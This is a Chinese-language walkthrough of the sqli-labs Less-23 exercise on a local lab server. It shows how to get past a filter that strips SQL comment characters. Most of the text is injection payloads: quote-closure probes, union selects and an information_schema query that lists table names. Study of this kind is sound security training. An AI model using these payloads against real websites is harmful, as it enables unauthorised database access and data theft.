基于get的过滤了的注入
0X1测试闭合
127.0.0.1/sql1/Less-23/?id=1‘
http://127.0.0.1/sql1/Less-23/?id=1%27%27
0X02 然后就是组合拳的操作了
那么应该是’闭合 那么我们可以尝试用# 闭合 这里要url编码一次 so 我们用%23
?id=1‘ order by 1%23
但是为什么还报错
我们来看看源代码 原来这里用正则表达式过滤了 # --这两种闭合 第二种我还没有试过...哈哈
那我们只能用单引号闭合喽 因为单引号里面的不会被执行 所以我们用and 闭合
构造语句
?id=1‘ and ‘1‘=‘1
正确
?id=-1‘ union select 1,database(),3 and ‘1‘=‘1
0X01爆表名
a 爆列名
?id=-1‘ order by 100 and ‘1‘=‘1
?id=-1‘ union select 1,(select table_name from information_schema.tables where table_schema=‘security‘ limit 0,1),3 and ‘1‘=‘1
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。
